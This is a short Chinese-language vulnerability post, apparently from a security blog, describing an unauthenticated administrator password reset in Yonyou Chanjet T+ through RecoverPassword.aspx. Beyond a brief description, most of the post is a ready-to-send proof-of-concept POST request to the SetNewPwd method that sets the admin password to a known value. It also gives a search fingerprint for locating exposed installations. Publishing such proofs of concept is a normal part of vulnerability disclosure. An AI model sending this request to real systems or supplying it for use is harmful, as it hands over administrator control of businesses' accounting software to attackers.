Yonyou Chanjet T+ RecoverPassword.aspx 管理员密码修改漏洞
# Yonyou Chanjet T+ RecoverPassword.aspx 管理员密码修改漏洞
## 漏洞描述
Yonyou Chanjet T+ RecoverPassword.aspx 存在未授权管理员密码修改漏洞,攻击者可以通过漏洞修改管理员账号...
Yonyou Chanjet T+ RecoverPassword.aspx 管理员密码修改漏洞
漏洞描述
Yonyou Chanjet T+ RecoverPassword.aspx 存在未授权管理员密码修改漏洞,攻击者可以通过漏洞修改管理员账号密码登录后台
漏洞影响
Yonyou Chanjet T+
网络测绘
app="Chanjet通-TPlus"
漏洞复现
登录页面
验证POC, 重置账号密码为 admin/123qwe
POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd
{"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}
- 发表于 2024-07-12 18:47:49
- 阅读 ( 2307 )
- 分类:Web应用
带头大哥
456 篇文章